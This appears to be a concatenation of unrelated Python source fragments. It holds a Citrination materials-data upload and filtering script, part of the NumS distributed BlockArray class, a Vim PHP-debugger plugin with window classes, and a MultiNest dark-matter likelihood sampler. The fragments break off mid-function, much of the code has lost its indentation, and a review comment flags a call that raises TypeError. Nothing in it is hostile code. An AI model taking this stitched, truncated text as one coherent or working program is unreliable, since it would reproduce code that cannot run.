    Constructs its own client (the original referenced an undefined global
    `client`, raising NameError), matching get_files_from_dataset().

    :param base_input_dir: directory containing the pif JSON files
    :param dataset_id: target Citrination dataset id
    """
    client = CitrinationClient(os.environ['CITRINATION_ADAPT_API_KEY'],
                               site='https://adapt.citrination.com')
    for f in os.listdir(base_input_dir):
        if ".json" in f:
            print("UPLOADING: ", base_input_dir + f)
            result = client.data.upload(dataset_id, base_input_dir + f, dest_path=f)
            print(result.__dict__)
def remove_outliers(base_input_dir):
    """Blank the 'max pore diameter' scalar of systems whose value exceeds
    120 um, writing "<name>_no_outliers.json" next to each refined file.

    Uses `with` so file handles are closed (the original leaked them).
    NOTE(review): setting ``prop.scalars = ""`` (rather than dropping the
    property) mirrors the original behavior -- downstream consumers appear
    to expect the empty scalar; confirm before changing.

    :param base_input_dir: directory of "_refined.json" files
    """
    for f in os.listdir(base_input_dir):
        if "_refined.json" not in f:
            continue
        print(f)
        infile_path = base_input_dir + f
        with open(infile_path, 'r') as infile:
            systems = pif.load(infile)
        for system in systems:
            for prop in system.properties:
                if prop.name == 'max pore diameter':
                    mpd = float(prop.scalars.value)
                    if mpd > 120:
                        print(pif.dumps(prop))
                        prop.scalars = ""
        outfile_path = infile_path.replace(".json", "_no_outliers.json")
        with open(outfile_path, 'w') as outfile:
            pif.dump(systems, outfile)
# refines unlabeled records in design space to just records from P005_B002
def refine_design_space(input_dir, output_dir):
    """Filter each JSON file's systems for the design space.

    A system is kept when it has measured properties, or when the file is
    from the P005_B002 build (whose unlabeled records define the design
    space).  File handles are closed via `with` (previously leaked).

    :param input_dir: directory of pif JSON files to filter
    :param output_dir: directory the filtered files are written to
    """
    for f in os.listdir(input_dir):
        if ".json" not in f:
            continue
        infile_path = input_dir + f
        with open(infile_path, 'r') as infile:
            systems = pif.load(infile)
        print(f, len(systems))
        # Equivalent to the original "pass unless" double negative.
        refined_systems = [s for s in systems if s.properties or "P005_B002" in f]
        print(f, len(refined_systems))
        outfile_path = output_dir + f
        with open(outfile_path, 'w') as outfile:
            pif.dump(refined_systems, outfile)
def refine_by_id(input_dir, output_dir):
ids = ["P005_B002_V09", "P005_B002_U09", "P005_B002_W09", "P005_B002_O04", "P005_B002_P04", "P005_B002_V07",
"P005_B002_Y09", "P005_B002_V04", "P005_B002_T09", "P005_B002_V10", "P005_B002_V06", "P005_B002_V08",
"P005_B002_V02", "P005_B002_V01", "P005_B002_L06", "P005_B002_V05", "P005_B002_O03", "P005_B002_L07",
"P005_B002_X10", "P005_B002_C14", "P005_B002_V11", "P005_B002_B14", "P005_B002_A15", | |
# coding=utf-8
# Copyright (C) 2020 NumS Development Team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
import numpy as np
from nums.core.array import selection
from nums.core.array import utils as array_utils
from nums.core.array.base import BlockArrayBase, Block
from nums.core.array.view import ArrayView
from nums.core.grid.grid import ArrayGrid
class BlockArray(BlockArrayBase):
@classmethod
def empty(cls, shape, block_shape, dtype, cm):
grid = ArrayGrid(shape=shape,
block_shape=block_shape,
dtype=dtype.__name__)
grid_meta = grid.to_meta()
arr = BlockArray(grid, cm)
for grid_entry in grid.get_entry_iterator():
arr.blocks[grid_entry].oid = cm.empty(grid_entry, grid_meta,
syskwargs={
"grid_entry": grid_entry,
"grid_shape": grid.grid_shape
})
return arr
@classmethod
def from_scalar(cls, val, cm):
if isinstance(val, int):
dtype = int
elif isinstance(val, float):
dtype = float
else:
assert isinstance(val, (np.int32, np.int64, np.float32, np.float64))
dtype = None
return BlockArray.from_np(np.array(val, dtype=dtype),
block_shape=(),
copy=False,
cm=cm)
@classmethod
def from_oid(cls, oid, shape, dtype, cm):
block_shape = shape
grid = ArrayGrid(shape, block_shape, dtype.__name__)
ba = BlockArray(grid, cm)
for i, grid_entry in enumerate(grid.get_entry_iterator()):
assert i == 0
ba.blocks[grid_entry].oid = oid
return ba
@classmethod
def from_np(cls, arr, block_shape, copy, cm):
dtype_str = str(arr.dtype)
grid = ArrayGrid(arr.shape, block_shape, dtype_str)
rarr = BlockArray(grid, cm)
grid_entry_iterator = grid.get_entry_iterator()
for grid_entry in grid_entry_iterator:
grid_slice = grid.get_slice(grid_entry)
block = arr[grid_slice]
if copy:
block = np.copy(block)
rarr.blocks[grid_entry].oid = cm.put(block)
rarr.blocks[grid_entry].dtype = getattr(np, dtype_str)
return rarr
@classmethod
def from_blocks(cls, arr: np.ndarray, result_shape, cm):
sample_idx = tuple(0 for dim in arr.shape)
if isinstance(arr, Block):
sample_block = arr
result_shape = ()
else:
sample_block = arr[sample_idx]
if result_shape is None:
result_shape = array_utils.shape_from_block_array(arr)
result_block_shape = sample_block.shape
result_dtype_str = sample_block.dtype.__name__
result_grid = ArrayGrid(shape=result_shape,
block_shape=result_block_shape,
dtype=result_dtype_str)
assert arr.shape == result_grid.grid_shape
result = BlockArray(result_grid, cm)
for grid_entry in result_grid.get_entry_iterator():
if isinstance(arr, Block):
block: Block = arr
else:
block: Block = arr[grid_entry]
result.blocks[grid_entry] = block
return result
def copy(self):
grid_copy = self.grid.from_meta(self.grid.to_meta())
rarr_copy = BlockArray(grid_copy, self.cm)
for grid_entry in grid_copy.get_entry_iterator():
rarr_copy.blocks[grid_entry] = self.blocks[grid_entry].copy()
return rarr_copy
def touch(self):
"""
"Touch" an array. This is an efficient distributed "wait" operation.
"""
oids = []
for grid_entry in self.grid.get_entry_iterator():
block: Block = self.blocks[grid_entry]
oids.append(self.cm.touch(block.oid, syskwargs={
"grid_entry": block.grid_entry,
"grid_shape": block.grid_shape
}))
self.cm.get(oids)
return self
    def reshape(self, *shape, **kwargs):
        """Reshape to `shape`, accepting numpy-style call forms:
        ``a.reshape(2, 3)``, ``a.reshape((2, 3))``, or ``a.reshape()`` (noop).

        :param shape: target shape; may contain -1 (resolved by Reshape).
        :param kwargs: only ``block_shape`` is honored; if omitted it is kept
            for a noop reshape or chosen by the compute manager otherwise.
        """
        block_shape = kwargs.get("block_shape", None)
        if array_utils.is_int(shape):
            shape = (shape,)
        elif len(shape) == 0:
            # No args: keep the current shape.
            shape = self.shape
        elif isinstance(shape[0], (tuple, list)):
            # Single tuple/list argument.
            assert len(shape) == 1
            shape = shape[0]
        else:
            # Varargs of ints.
            assert all(np.issubdtype(type(n), int) for n in shape)
        shape = Reshape.compute_shape(self.shape, shape)
        if block_shape is None:
            if shape == self.shape:
                # This is a noop.
                block_shape = self.block_shape
            else:
                block_shape = self.cm.get_block_shape(shape, self.dtype)
        return Reshape()(self, shape, block_shape)
def expand_dims(self, axis):
"""
This function refers to the numpy implementation of expand_dims.
"""
if type(axis) not in (tuple, list):
axis = (axis,)
out_ndim = len(axis) + self.ndim
axis = np.core.numeric.normalize_axis_tuple(axis, out_ndim)
shape_it = iter(self.shape)
block_shape_it = iter(self.block_shape)
shape = [1 if ax in axis else next(shape_it) for ax in range(out_ndim)]
block_shape = [1 if ax in axis else next(block_shape_it) for ax in range(out_ndim)]
return self.reshape(shape, block_shape=block_shape)
def squeeze(self):
shape = self.shape
block_shape = self.block_shape
new_shape = []
new_block_shape = []
for s, b in zip(shape, block_shape):
if s == 1:
assert b == 1
continue
new_shape.append(s)
new_block_shape.append(b)
return self.reshape(new_shape, block_shape=new_block_shape)
def swapaxes(self, axis1, axis2):
meta_swap = self.grid.to_meta()
shape = list(meta_swap["shape"])
block_shape = list(meta_swap["block_shape"])
dim = len(shape)
if axis1 >= dim or axis2 >= dim:
raise ValueError("axis is larger than the array dimension")
shape[axis1], shape[axis2] = shape[axis2], shape[axis1]
block_shape[axis1], block_shape[axis2] = block_shape[axis2], block_shape[axis1]
meta_swap["shape"] = tuple(shape)
meta_swap["block_shape"] = tuple(block_shape)
grid_swap = ArrayGrid.from_meta(meta_swap)
rarr_src = np.ndarray(self.blocks.shape, dtype='O')
for grid_entry in self.grid.get_entry_iterator():
rarr_src[grid_entry] = self.blocks[grid_entry].swapaxes(axis1, axis2)
rarr_src = rarr_src.swapaxes(axis1, axis2)
rarr_swap = BlockArray(grid_swap, self.cm, rarr_src)
return rarr_swap
def __getattr__(self, item):
if item == "__array_priority__" or item == "__array_struct__":
# This is triggered by a numpy array on the LHS.
raise ValueError("Unable to covert numpy array to block array.")
elif item == "ndim":
return len(self.shape)
elif item == "T":
metaT = self.grid.to_meta()
metaT["shape"] = tuple(reversed(metaT["shape"]))
metaT["block_shape"] = tuple(reversed(metaT["block_shape"]))
gridT = ArrayGrid.from_meta(metaT)
rarrT = BlockArray(gridT, self.cm)
rarrT.blocks = np.copy(self.blocks.T)
for grid_entry in rarrT.grid.get_entry_iterator():
rarrT.blocks[grid_entry] = rarrT.blocks[grid_entry].transpose()
return rarrT
else:
raise NotImplementedError(item)
    def __getitem__(self, item):
        """Subscript the array.

        A trailing array-like index preceded only by full slices (e.g.
        ``a[:, :, idx]`` or ``a[idx]``) is routed to the fast single-axis
        advanced-subscript path; everything else goes through the generic
        ArrayView machinery.
        """
        if not isinstance(item, tuple):
            ss = (item,)
        else:
            ss = item
        # We need to fetch any block arrays.
        tmp = []
        for entry in ss:
            if isinstance(entry, BlockArray):
                tmp.append(entry.get())
            else:
                tmp.append(entry)
        ss = tuple(tmp)
        is_handled_advanced = True
        if len(ss) > 1:
            # Check if all entries are full slices except the last entry.
            for entry in ss[:-1]:
                is_handled_advanced = is_handled_advanced and (isinstance(entry, slice)
                                                              and entry.start is None
                                                              and entry.stop is None)
        if is_handled_advanced and array_utils.is_array_like(ss[-1]):
            # Treat this as a shuffle.
            return self._advanced_single_array_subscript(sel=(ss[-1],), axis=len(ss)-1)
        av: ArrayView = ArrayView.from_block_array(self)
        # TODO (hme): We don't have to create, but do so for now until we need to optimize.
        return av[item].create(BlockArray)
    def _advanced_single_array_subscript(self, sel: tuple, block_size=None, axis=0):
        """Advanced (integer-array) indexing along a single axis.

        Builds a destination array whose `axis` dimension is ``len(sel[0])``,
        then, destination block by destination block, copies the selected
        rows from every source block that contributes to it.

        :param sel: 1-tuple holding a 1-d integer index array.
        :param block_size: block size of the result along `axis`; defaults to
            this array's block size on that axis.
        :param axis: the axis being indexed.
        """
        def group_by_block(dst_grid_entry,
                           dst_slice_tuples,
                           src_grid,
                           dst_index_list,
                           src_index_list,
                           axis=0):
            # Block grid entries needed to write to given dst_slice_selection.
            src_blocks = {}
            dst_slice_np = np.array(dst_slice_tuples).T
            dst_index_arr = np.array(dst_index_list)
            src_index_arr = np.array(src_index_list)
            # Pick the smallest type to represent indices.
            # A set of these indices may be transmitted over the network,
            # so we want to pick the smallest encoding possible.
            index_types = [(2 ** 8, np.uint8), (2 ** 16, np.uint16),
                           (2 ** 32, np.uint32), (2 ** 64, np.uint64)]
            index_type = None
            for bound, curr_index_type in index_types:
                if np.all(np.array(src_grid.block_shape[axis]) < bound) and np.all(
                        dst_slice_np[1][axis] < bound):
                    index_type = curr_index_type
                    break
            if index_type is None:
                raise Exception("Unable to encode block indices, blocks are too large.")
            # Source blocks must match the destination entry on every
            # dimension except `axis`.
            dst_entry_test = list(dst_grid_entry[:axis]) + list(dst_grid_entry[axis + 1:])
            num_pairs_check = 0
            for grid_entry in src_grid.get_entry_iterator():
                # Must match on every entry except axis.
                src_entry_test = list(grid_entry[:axis]) + list(grid_entry[axis+1:])
                if dst_entry_test != src_entry_test:
                    # Skip this block.
                    continue
                src_slice_np = np.array(src_grid.get_slice_tuples(grid_entry)).T
                index_pairs = []
                for i in range(src_index_arr.shape[0]):
                    src_index = src_index_arr[i]
                    dst_index = dst_index_arr[i]
                    # Keep only indices that fall within this source block,
                    # rebased to block-local offsets on both sides.
                    if np.all((src_slice_np[0][axis] <= src_index)
                              & (src_index < src_slice_np[1][axis])):
                        index_pair = (np.array(dst_index - dst_slice_np[0][axis], dtype=index_type),
                                      np.array(src_index - src_slice_np[0][axis], dtype=index_type))
                        index_pairs.append(index_pair)
                        num_pairs_check += 1
                if len(index_pairs) > 0:
                    src_blocks[grid_entry] = index_pairs
            # Every destination index must have been matched exactly once.
            assert num_pairs_check == len(dst_index_list)
            return src_blocks
        array = sel[0]
        assert len(array.shape) == 1
        assert np.all(0 <= array) and np.all(array < self.shape[axis])
        if block_size is None:
            block_size = self.block_shape[axis]
        axis_dim = len(array)
        shape = tuple(list(self.shape[:axis]) + [axis_dim] + list(self.shape[axis+1:]))
        block_shape = tuple(list(self.block_shape[:axis])
                            + [block_size]
                            + list(self.block_shape[axis+1:]))
        dst_arr = BlockArray.empty(shape=shape, block_shape=block_shape,
                                   dtype=self.dtype, cm=self.cm)
        for dst_grid_entry in dst_arr.grid.get_entry_iterator():
            dst_block: Block = dst_arr.blocks[dst_grid_entry]
            dst_slice_selection = dst_arr.grid.get_slice(dst_grid_entry)
            # Destination positions along `axis`, and the source rows the
            # index array maps them to.
            dst_index_array = selection.slice_to_range(dst_slice_selection[axis], shape[axis])
            src_index_array = array[dst_slice_selection[axis]]
            assert len(dst_index_array) == len(src_index_array)
            # Can this be sped up by grouping all src blocks outside of this loop?
            src_blocks = group_by_block(
                dst_grid_entry,
                dst_arr.grid.get_slice_tuples(dst_grid_entry),
                self.grid,
                dst_index_array,
                src_index_array,
                axis
            )
            for src_grid_entry in src_blocks:
                src_block: Block = self.blocks[src_grid_entry]
                index_pairs = src_blocks[src_grid_entry]
                syskwargs = {"grid_entry": dst_grid_entry, "grid_shape": dst_arr.grid.grid_shape}
                dst_block.oid = self.cm.update_block_along_axis(dst_block.oid,
                                                                src_block.oid,
                                                                index_pairs,
                                                                axis,
                                                                syskwargs=syskwargs)
        return dst_arr
def __setitem__(self, key, value):
av: ArrayView = ArrayView.from_block_array(self)
av[key] = value
def check_or_convert_other(self, other):
if isinstance(other, BlockArray):
return other
if isinstance(other, np.ndarray):
# TODO (MWE): for self.shape (4,) self.block_shape: (1,),
# other.shape: (1, 4) this fails due to a failure to broadcast block shape
return self.from_np(other, self.block_shape, False, self.cm)
if isinstance(other, list):
other = np.array(other)
return self.from_np(other, self.block_shape, False, self.cm)
if isinstance(other, (np.int32, np.int64, np.float32, np.float64, int, float)):
return self.from_scalar(other, self.cm)
if isinstance(other, (np.bool, np.bool_, bool)):
other = np.array(other)
return self.from_np(other, self.block_shape, False, self.cm)
raise Exception("Unsupported type %s" % type(other))
def ufunc(self, op_name):
result = self.copy()
for grid_entry in self.grid.get_entry_iterator():
result.blocks[grid_entry] = self.blocks[grid_entry].ufunc(op_name)
return result
def _tree_reduce(self, op_name, blocks_or_oids, result_grid_entry, result_grid_shape):
"""
Basic tree reduce imp.
Schedules op on same node as left operand.
:param op_name: The reduction op.
:param blocks_or_oids: A list of type Block or a list of tuples.
Tuples must be of the form
| |
# -*- coding: utf-8 -*-
import os
import sys
import vim
import socket
import base64
import traceback
import xml.dom.minidom
import re
import unicodedata
#######################################################################################################################
# #
# this diagram is little outdated. #
# #
# #
# +---[ class Debugger ]-----------+ #
# | [m] run() | #
# | [m] mark() | #
# | [m] command() | #
# | [m] stop() | #
# +--------- [m] handle_msg() ------------------+ #
# | | | | handle all other tags #
# if error +--------> [m] handle_error() | | comming from server #
# | | [m] handle_*() <-----------------+ #
# | | | #
# if <response > +--------> [m] handle_response() -------------+ #
# | | | if <response command='*'> #
# | [m] handle_response_*() <----------+ #
# | | #
# | +--[ class DbgProtocol ]--+ | #
# +-------+ 1. connect | | | | #
# |debug | ---------------------> [m] accept() | | #
# | | <-- 2. send ---------- [m] send_msg() | | #
# | server| --- 3. recv ---------> [m] recv_msg() | | #
# +-------+ | | | | #
# | +-------------------------+ | #
# | | #
# | +--[ class BreakPoint ]---+ | #
# | | manage breakpoints | | #
# | | [m] add() | | #
# | | [m] remove() | | #
# | | [m] list() | | #
# | +-------------------------+ | VIM #
# | | +--------------+-----+ #
# [m] method | +--[ class DebugUI ]------+ | | | | <----+ #
# [f] class | | [m] debug_mode() | ------------------ | +-----+ | #
# | | [m] normal_mode() | | controls | srv | | <----+ #
# | | [m] goto() | | all vim | view +-----+ | #
# | | [m] stackwrite() | | windows | | | <----+ #
# | | [m] stackwrite() | | | +-----+ | #
# | +-------------------------+ | | | | <----+ #
# | | | +-----+ | #
# | +--[ class VimWindow ]----+ | | | | <----+ #
# | | [m] create() | | +--------------+-----+ | #
# | | [m] write() | | | #
# | | [m] create() | ------------------------------------------------+ #
# | | [m] create() | | controls each debug window #
# | +-------------------------+ | (except src view) #
# | | #
# +--------------------------------+ #
# #
# global debugger <----+ #
# | creates #
# [f] debugger_init() --+ #
# [f] debugger_run() <-+ #
# [f] debugger_context() | #
# [f] debugger_command() +------ map <F5> :python debugger_run() #
# [f] debugger_stop() | ... etc ... #
# [f] debugger_mark() <-+ #
# #
# #
#######################################################################################################################
#class XMLPrintFold(XMLPrint):
# def fixup_childs(self, line, node, level):
# line = ('{{{' + str(level+1)).ljust(level*4+6) + line + '\n'
# line += self.xml_stringfy_childs(node, level+1)
# line += '}}}' + str(level+1) + '\n'
# return line
# def fixup_single(self, line, node, level):
# return ''.ljust(level*4+6) + line + '\n'
#
class VimWindow:
""" wrapper class of window of vim """
def __init__(self, name = 'DEBUG_WINDOW'):
""" initialize """
self.name = name
self.buffer = None
self.firstwrite = 1
def isprepared(self):
""" check window is OK """
if self.buffer == None or len(dir(self.buffer)) == 0 or self.getwinnr() == -1:
return 0
return 1
def prepare(self):
""" check window is OK, if not then create """
if not self.isprepared():
self.create()
def on_create(self):
pass
def getwinnr(self):
return int(vim.eval("bufwinnr('"+self.name+"')"))
def xml_on_element(self, node,insert):
line = str(node.nodeName)
if node.hasAttributes():
for (n,v) in node.attributes.items():
line += str(' %s=%s' % (n,v))
return line
def xml_on_attribute(self, node,insert):
return str(node.nodeName)
def xml_on_entity(self, node,insert):
return 'entity node'
def xml_on_comment(self, node,insert):
return 'comment node'
def xml_on_document(self, node,insert):
return '#document'
def xml_on_document_type(self, node,insert):
return 'document type node'
def xml_on_notation(self, node,insert):
return 'notation node'
def xml_on_text(self, node,insert):
return node.data
def xml_on_processing_instruction(self, node,insert):
return 'processing instruction'
def xml_on_cdata_section(self, node,insert):
return node.data
def write(self, msg):
""" append last """
if type(msg) is unicode:
msg = unicodedata.normalize('NFKD',msg).encode('ascii','ignore')
self.prepare()
if self.firstwrite == 1:
self.firstwrite = 0
self.buffer[:] = str(msg).split('\n')
else:
self.buffer.append(str(msg).split('\n'))
self.command('normal G')
#self.window.cursor = (len(self.buffer), 1)
def insert(self, msg, lineno = None, overwrite = False, allowEmpty = False):
""" insert into current position in buffer"""
if len(msg) == 0 and allowEmpty == False:
return
self.prepare()
if self.firstwrite == 1:
self.firstwrite = 0
self.buffer[:] = str(msg).split('\n')
else:
if lineno == None:
(lineno, rol) = vim.current.window.cursor
remaining_buffer = str(msg).split('\n')
if overwrite:
lfrom = lineno + 1
else:
lfrom = lineno
remaining_buffer.extend(self.buffer[lfrom:])
del self.buffer[lineno:]
for line in remaining_buffer:
self.buffer.append(line)
def create(self, method = 'new'):
""" create window """
vim.command('silent ' + method + ' ' + self.name)
#if self.name != 'LOG___WINDOW':
vim.command("setlocal buftype=nofile")
self.buffer = vim.current.buffer
self.width = int( vim.eval("winwidth(0)") )
self.height = int( vim.eval("winheight(0)") )
self.on_create()
def destroy(self):
""" destroy window """
if self.buffer == None or len(dir(self.buffer)) == 0:
return
#if self.name == 'LOG___WINDOW':
# self.command('hide')
#else:
self.command('bdelete ' + self.name)
self.firstwrite = 1
def clean(self):
""" clean all datas in buffer """
self.prepare()
self.buffer[:] = []
self.firstwrite = 1
def command(self, cmd):
""" go to my window & execute command """
self.prepare()
winnr = self.getwinnr()
if winnr != int(vim.eval("winnr()")):
vim.command(str(winnr) + 'wincmd w')
vim.command(cmd)
def _xml_stringfy(self, node, insert, level = 0, encoding = None):
if node.nodeType == node.ELEMENT_NODE:
line = self.xml_on_element(node,insert)
elif node.nodeType == node.ATTRIBUTE_NODE:
line = self.xml_on_attribute(node,insert)
elif node.nodeType == node.ENTITY_NODE:
line = self.xml_on_entity(node,insert)
elif node.nodeType == node.COMMENT_NODE:
line = self.xml_on_comment(node,insert)
elif node.nodeType == node.DOCUMENT_NODE:
line = self.xml_on_document(node,insert)
elif node.nodeType == node.DOCUMENT_TYPE_NODE:
line = self.xml_on_document_type(node,insert)
elif node.nodeType == node.NOTATION_NODE:
line = self.xml_on_notation(node,insert)
elif node.nodeType == node.PROCESSING_INSTRUCTION_NODE:
line = self.xml_on_processing_instruction(node,insert)
elif node.nodeType == node.CDATA_SECTION_NODE:
line = self.xml_on_cdata_section(node,insert)
elif node.nodeType == node.TEXT_NODE:
line = self.xml_on_text(node,insert)
else:
line = 'unknown node type'
if node.hasChildNodes():
return self.fixup_childs(line, node, insert, level)
elif len(line) > 0:
return self.fixup_single(line, node, insert, level)
return line
def fixup_childs(self, line, node, insert, level):
line = ''.ljust(level*4) + line + '\n'
line += self.xml_stringfy_childs(node, insert, level+1)
return line
def fixup_single(self, line, node, insert, level):
return ''.ljust(level*4) + line + '\n'
def xml_stringfy(self, xml, insert = False):
return self._xml_stringfy(xml,insert)
def xml_stringfy_childs(self, node, insert = False, level = 0):
line = ''
for cnode in node.childNodes:
line += self._xml_stringfy(cnode, insert, level)
return line
def write_xml(self, xml):
self.write(self.xml_stringfy(xml))
def write_xml_childs(self, xml):
self.write(self.xml_stringfy_childs(xml))
  def insert_xml(self, xml,lineno):
    """ Insert the rendered DOM tree at `lineno`, indented to match the
    surrounding text. """
    level = self.determine_current_level(lineno)
    # NOTE(review): xml_stringfy() is defined with only (xml, insert)
    # parameters, so this three-argument call raises TypeError unless a
    # `level` parameter is added to xml_stringfy -- confirm.
    string = self.xml_stringfy(xml,True,level-1)
    self.insert(string.strip("\n"),lineno,True)
def insert_xml_childs(self, xml,lineno):
level = self.count_left_spaces(lineno)
string = self.xml_stringfy_childs(xml,True,level-1)
self.insert(string.strip("\n"),lineno,True)
def count_left_spaces(self,lineno):
line = self.buffer[lineno]
matches = re.match("^(\s*)",line)
if matches:
spaces = matches.group(1)
return len(spaces)
else:
return 0
class StackWindow(VimWindow):
  """ Window listing the current call stack, one frame per line. """
  def __init__(self, name = 'STACK_WINDOW'):
    VimWindow.__init__(self, name)
  def xml_on_element(self, node, insert):
    """ Format a <stack> element as 'level where file:line'; any other
    element is deferred to the base class formatter. """
    if node.nodeName != 'stack':
      return VimWindow.xml_on_element(self, node, insert)
    where = node.getAttribute('where')
    if where != '{main}':
      # function frames get call parentheses appended
      where += '()'
    return '%-2s %-15s %s:%s' % (
        node.getAttribute('level'),
        where,
        node.getAttribute('filename')[7:],
        node.getAttribute('lineno'))
  def on_create(self):
    """ Define the highlight group used to mark the active frame. """
    self.command('highlight CurStack term=reverse ctermfg=White ctermbg=Red gui=reverse')
    self.highlight_stack(0)
  def highlight_stack(self, no):
    """ Highlight the stack frame whose level number is `no`. """
    self.command('syntax clear')
    self.command('syntax region CurStack start="^' +str(no)+ ' " end="$"')
class LogWindow(VimWindow):
  """ Window that accumulates debugger log output. """
  def __init__(self, name = 'LOG___WINDOW'):
    VimWindow.__init__(self, name)
  def on_create(self):
    """ Enable wrapping and marker folding for the log buffer. """
    self.command('setlocal wrap fdm=marker fmr={{{,}}} fdl=0')
class TraceWindow(VimWindow):
  """ Window for protocol traces; created lazily on first write. """
  def __init__(self, name = 'TRACE_WINDOW'):
    VimWindow.__init__(self, name)
    self.created = 0
  def xml_on_element(self, node, insert):
    """ Render an element, appending the decoded error message for
    <error> elements that carry a numeric code attribute. """
    rendered = VimWindow.xml_on_element(self, node, insert)
    if node.nodeName == 'error' and node.hasAttribute('code'):
      rendered += ' : ' + error_msg[int(node.getAttribute('code'))]
    return rendered
  def create(self,method="new"):
    """ Create the window and remember that it now exists. """
    self.created = 1
    VimWindow.create(self,method)
  def write(self,msg):
    """ Write `msg`, lazily creating a one-line split window first. """
    if self.created == 0:
      self.create('rightbelow 1new')
    VimWindow.write(self,msg)
  def on_create(self):
    self.command('set wrap fdm=marker fmr={{{,}}} fdl=0')
class CmdWindow(VimWindow):
  """ Interactive command window: one '{mode} args' command per line. """
  def __init__(self, name = 'CMD_WINDOW'):
    VimWindow.__init__(self, name)
  def input(self, mode, arg = ''):
    """ Append `arg` to the last line when it already is a {mode}
    command, otherwise start a new '{mode} arg' line. """
    line = self.buffer[-1]
    if line[:len(mode)+1] == '{'+mode+'}':
      self.buffer[-1] = line + arg
    else:
      self.buffer.append('{'+mode+'} '+arg)
  def get_command(self,latest = True):
    """ Parse and return (command, argument) from the last buffer line,
    or from the cursor line when `latest` is False.

    Raises CmdInvalidError for comment lines, unknown commands and
    lines that do not match the '{command} args' format.
    """
    if latest:
      line = self.buffer[-1]
    else:
      (lnum, rol) = vim.current.window.cursor
      line = self.buffer[lnum-1]
    # startswith() instead of line[0]: an empty line must not raise
    # IndexError before we can report a parse error.
    if line.startswith('#'):
      raise CmdInvalidError({"message":"Line is a comment, not a command"})
    allowed_cmds = ["eval","property_get","property_insert","context_get","context_class","context_global","context_names"]
    # raw string: \{ and \s are invalid escapes in a plain string
    matches = re.match(r'^\{([^}]+)\}\s*(.*)$',line)
    if matches:
      if matches.group(1) in allowed_cmds:
        return (matches.group(1),matches.group(2))
      else:
        raise CmdInvalidError({"message":"Not a command: "+matches.group(1)})
    else:
      raise CmdInvalidError({"message":"Unrecognised format for command line"})
  def on_create(self):
    """ Set buffer-local options and map <cr> to execute the command. """
    self.command('set nowrap number fdm=marker fmr={{{,}}} fdl=0')
    self.command('inoremap <buffer> <cr> <esc>:python debugger.watch_execute(False)<cr>')
    self.command('nnoremap <buffer> <cr> <esc>:python debugger.watch_execute(False)<cr>')
    self.write("# Choice of commands: \n\
    # {context_get}, {property_get} <property>, {eval} <expr>, \
    {context_global}, {context_class}\n#")
class WatchWindow(VimWindow):
def __init__(self, name = 'WATCH_WINDOW'):
VimWindow.__init__(self, name)
self.cline = None
def fixup_single(self, line, node, | |
"""
Do a likelihood fit. The class NestedSamplerStatModel is used for fitting
applying the bayesian algorithm nestle/multinest
"""
from __future__ import absolute_import, unicode_literals
import datetime
import json
import os
import shutil
import tempfile
from warnings import warn
import corner
import matplotlib.pyplot as plt
import numpy as np
from scipy import special as spsp
import dddm
import typing as ty
from immutabledict import immutabledict
export, __all__ = dddm.exporter()
@export
class MultiNestSampler(dddm.StatModel):
    """Bayesian likelihood fit of a WIMP signal using (py)MultiNest.

    Extends :class:`dddm.StatModel` with nested sampling: the priors
    are fed to MultiNest through a prior transform, output is written
    to a temporary folder first and collected into ``results_dir`` by
    :meth:`save_results`.
    """

    def __init__(self,
                 wimp_mass: ty.Union[float, int],
                 cross_section: ty.Union[float, int],
                 spectrum_class: ty.Union[dddm.DetectorSpectrum,
                                          dddm.GenSpectrum],
                 prior: dict,
                 tmp_folder: str,
                 results_dir: str = None,
                 fit_parameters=('log_mass', 'log_cross_section', 'v_0', 'v_esc', 'density', 'k'),
                 detector_name=None,
                 verbose=False,
                 notes='default',
                 nlive=1024,
                 tol=0.1,
                 ):
        """
        :param wimp_mass: WIMP mass of the benchmark model
        :param cross_section: WIMP-nucleon cross-section of the benchmark
        :param spectrum_class: spectrum generator used to evaluate rates
        :param prior: prior specification per fit parameter
        :param tmp_folder: scratch folder for MultiNest output
        :param results_dir: final destination for saved results
        :param fit_parameters: names of the parameters being fitted
        :param nlive: number of MultiNest live points
        :param tol: evidence tolerance (stopping criterion)
        """
        super().__init__(wimp_mass=wimp_mass,
                         cross_section=cross_section,
                         spectrum_class=spectrum_class,
                         prior=prior,
                         tmp_folder=tmp_folder,
                         fit_parameters=fit_parameters,
                         detector_name=detector_name,
                         verbose=verbose,
                         notes=notes,
                         )
        self.results_dir = results_dir
        self.config.update(
            {'tol': tol,  # Tolerance for sampling
             'nlive': nlive,  # number of live points
             })
        # bookkeeping: whether the fit ran, where results were saved
        self.log_dict = {
            'did_run': False,
            'saved_in': None,
            'tmp_dir': tmp_folder,
        }
        self.result = False

    def check_did_run(self):
        """Run the fit now if it has not been run yet."""
        if not self.log_dict['did_run']:
            self.log.info('did not run yet, lets fire it up!')
            self.run()
        else:
            self.log.info('did run')

    def check_did_save(self):
        """Save the results if they have not been saved yet."""
        if self.log_dict['saved_in'] is None:
            # bug fix: this message used to be logged unconditionally,
            # i.e. even when the results were already saved
            self.log.info(
                "did not save yet, we don't want to lose our results so better do it now"
            )
            self.save_results()

    def log_probability_nested(self, parameter_vals, parameter_names):
        """
        Evaluate the log-likelihood of the benchmark data for the given
        parameter values.

        :param parameter_vals: the values of the model/benchmark considered as the truth
        :param parameter_names: the names of the parameter_values
        :return: log-likelihood (float)
        :raises ValueError: when the likelihood evaluates to NaN
        """
        self.log.debug('there we go! Find that log probability')
        evaluated_rate = self.eval_spectrum(parameter_vals, parameter_names)
        ll = dddm.statistics.log_likelihood(self.benchmark_values, evaluated_rate)
        if np.isnan(ll):
            raise ValueError(f"Returned NaN from likelihood. ll = {ll}")
        self.log.debug('found it! returning the log likelihood')
        return ll

    def log_prior_transform_nested(self, x, x_name):
        """Map a unit-cube sample `x` onto the prior of parameter `x_name`.

        :param x: value in [0, 1] drawn by MultiNest
        :param x_name: parameter name looked up in the prior config
        :return: the parameter value corresponding to quantile `x`
        :raises ValueError: for unsupported prior types
        """
        self.log.debug(
            'doing some transformations for nestle/multinest to read the priors'
        )
        this_prior = self.config['prior'][x_name]
        prior_type = this_prior['prior_type']

        if prior_type == 'flat':
            a, b = this_prior['param']
